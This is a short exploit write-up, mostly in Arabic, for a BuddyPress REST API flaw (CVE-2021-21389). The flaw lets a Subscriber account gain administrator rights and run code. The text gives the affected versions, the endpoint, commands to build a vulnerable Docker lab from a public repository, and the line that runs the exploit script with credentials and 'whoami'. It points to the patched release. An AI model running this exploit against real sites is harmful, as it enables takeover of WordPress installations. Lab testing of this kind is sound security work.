
BuddyPress هو إضافة مفتوحة المصدر لـ WordPress تُستخدم لبناء موقع مجتمعي. في إصدارات BuddyPress من 5.0.0 حتى قبل 7.2.1، كان من الممكن لمستخدم عادي غير متميّز الحصول على صلاحيات مدير من خلال استغلال ثغرة في نقطة نهاية أعضاء REST API. تم إصلاح الثغرة في BuddyPress 7.2.1. يجب تحديث التثبيتات الحالية للإضافة إلى هذا الإصدار للتخفيف من المشكلة.
BuddyPress < 7.2.1 - تصعيد صلاحيات REST API إلى RCE
إثبات المفهوم (كامل)
الإصدار المتأثر: 5.0.0 إلى 7.2.0
متطلبات المستخدم: مستخدم من نوع Subscriber
الطريقة: تصعيد الصلاحيات إلى Administrator وتشغيل RCE عبر REST API
نقطة النهاية: /v1/members/me
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Other way to pull this docker instead of building:
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Access your host/IP
Ex: http://test.local:8080
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
مثال:

https://buddypress.org/2021/03/buddypress-7-2-1-security-release/